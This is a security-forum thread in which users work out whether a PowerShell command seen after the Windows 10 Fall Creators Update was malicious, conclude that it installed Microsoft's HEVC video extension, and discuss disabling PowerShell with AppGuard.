Need Help Suspicious command line after Fall Creators Update

Discussion in 'Apps - Questions & Help' started by shmu26, Dec 28, 2017.

  1. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    Date of initial issues:
    Today
    Steps taken to resolve, but unsuccessful?:
    scan with kapsersky, hitmanpro
    Operating System:
    Win10 pro x64
    List current issues or symptoms:
    none
    What do you say about this powershell command line? Safe, or malicious? It ran on my computer today, a while after updating to fall creators.

    "powershell" -noprofile -noninteractive -inputformat none -executionpolicy bypass add-provisionedappxpackage -online -packagepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.appx" -dependencypackagepath "c:\windows\temp\installhevcappxpackage\microsoft.vclibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.appx" -licensepath "c:\windows\temp\installhevcappxpackage\microsoft.hevcvideoextension_8wekyb3d8bbwe.x64.xml"
     
    upnorth, BryanB, ZeroDay and 4 others like this.
  2. Opcode

    Opcode Level 18
    Content Creator

    Aug 17, 2017
    890
    6,285
    Caille
    Windows 10
    I believe it is to do with installation of Windows Metro applications, the general ones such as your Mail application. Since the "appxpackage" is related to such packages, and there's the "add-" linked up to the instruction. Either a new application was added (Metro style) to the FCU environments, or a re-installation/update happened for one.

    I don't think you need to worry about any of it; you were installing the Creators Update and it happened afterwards after all. It's natural for Windows to do additional things in the background after a major update, and the Fall Creators Update changed a whole ton of things so it's not out of the ordinary in my opinion.

    You can try to track the execution of the Powershell back to the responsible culprit process, I'm sure you're fine. On that note, I recommend disabling Powershell unless you really need it because a lot of "file-less" attacks as people call them tend to like it.

    Edit:
    Get HEVC Video Extension - Microsoft Store

    I believe this is what was installed via the Powershell command. It's to do with videos/codecs. It allows you to play content in 4K/Ultra HD system-wide across all apps for HEVC content. You'd have to educate me on HEVC because I don't know much on media terms.
     
    upnorth, BoraMurdar, BryanB and 8 others like this.
  3. SHvFl

    SHvFl Level 32
    Content Creator Trusted

    Nov 19, 2014
    2,152
    16,384
    Supermodel for McDonald's
    Europe
    Windows 10
    Emsisoft
    Hevc=x265. You might heard it but if not it's a "new" codec that is trying to be mainstream for video encoding and replace x264.
     
  4. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    Thanks.
    When I saw all that appxpackage stuff in the command line, it looked to me like typical Microsoft jargon, so I just assumed that Voodooshield was blocking a false positive, and I sent it on to Dan. But he wasn't happy with "powershell" -noprofile -noninteractive -inputformat none -executionpolicy bypass , which he says is typical of malware.

    Anyways, HitmanPro didn't find anything to speak of on my system, so I am not worried. I will sleep tonight.
     
  5. SHvFl

    SHvFl Level 32
    Content Creator Trusted

    Nov 19, 2014
    2,152
    16,384
    Supermodel for McDonald's
    Europe
    Windows 10
    Emsisoft
    Yeah, it has to be the default hvec app windows 10 installs even on a clean install. I don't have the logs to go check for it but i know for sure it installed the app for me.
     
    shmu26 and Opcode like this.
  6. DeepWeb

    DeepWeb Level 9

    Jul 1, 2017
    435
    1,412
    Nurse
    On a journey
    Windows 10
    Emsisoft
    SHvFl, harlan4096, Andytay70 and 2 others like this.
  7. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    Opcode and SHvFl like this.
  8. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    But it is interesting that Microsoft used a powershell script to deliver an install. That's unusual, is it not?
     
    Opcode, BryanB and SHvFl like this.
  9. SHvFl

    SHvFl Level 32
    Content Creator Trusted

    Nov 19, 2014
    2,152
    16,384
    Supermodel for McDonald's
    Europe
    Windows 10
    Emsisoft
    Most of the store crap are delivered and uninstalled that way. I guess it's in order to give administrators more control or it's just more simple for them :p
     
  10. boredog

    boredog Level 8

    Jul 5, 2016
    387
    809
    Retired
    usa
    Windows 10
    Malwarebytes
    I don't remember seeing that block in Voodooshield or Appguard and I do have Powershell blocked in Appguard.
     
    SHvFl and shmu26 like this.
  11. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    So if a user totally disables powershell, he won't get those store installs/uninstalls. That could be either bad or good, depending on one's opinion of stuff from the microsoft store.
    Actually, installation requires a high level of privileges, so even restricting powershell (like with Appguard "guarded apps") would interfere. Correct?
     
    harlan4096 and SHvFl like this.
  12. boredog

    boredog Level 8

    Jul 5, 2016
    387
    809
    Retired
    usa
    Windows 10
    Malwarebytes
    This is how I was told to disable powershell in Appguard
    ScreenHunter_85 Dec. 28 14.48.jpg ScreenHunter_86 Dec. 28 14.48.jpg
     
    harlan4096, SHvFl and shmu26 like this.
  13. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,246
    13,483
    Utopia
    Interesting. Why do you have to also untick it in guarded apps? Powershell is unsigned, so even if it is a guarded app, it should not run once you add it to user space. That is my understanding of it.
     
    harlan4096 and SHvFl like this.
  14. Opcode

    Opcode Level 18
    Content Creator

    Aug 17, 2017
    890
    6,285
    Caille
    Windows 10
    Well Microsoft own Windows and thus their own components are active (their kernel for the OS, their components either elevated or not, etc.). Therefore, if Microsoft want, they can push out an update at any time which will temporarily enable Powershell for them to execute Powershell scripts, and then re-disable it.

    Then again I am sure they have a non-Powershell variant of what they needed to do somewhere and if not I doubt it'd be tricky for them to make one in a short time span for people who have it disabled.
     
    harlan4096, SHvFl and shmu26 like this.
  15. boredog

    boredog Level 8

    Jul 5, 2016
    387
    809
    Retired
    usa
    Windows 10
    Malwarebytes
    I wondered the very same thing until Lockdown advised me as to why. It was in an old thread over at Wilders. I think it was called the unofficial Appguard thread.
     
    harlan4096, SHvFl and shmu26 like this.
  16. SHvFl

    SHvFl Level 32
    Content Creator Trusted

    Nov 19, 2014
    2,152
    16,384
    Supermodel for McDonald's
    Europe
    Windows 10
    Emsisoft
    In theory i assume it will just not update them ever. I have a feeling the basic application are installed even before you get into windows.
     
    harlan4096, shmu26 and Opcode like this.
Loading...
Similar Threads Forum Date
Suspicious command line after Fall Creators Update Malware Analysis Dec 28, 2017
Q&A HitmanPro flagging KIS drivers and files as suspicious HitmanPro (Sophos) Jan 2, 2018
Poll Make malicious/suspicious extensions thread a STICKY Browsers and Extensions Jan 2, 2018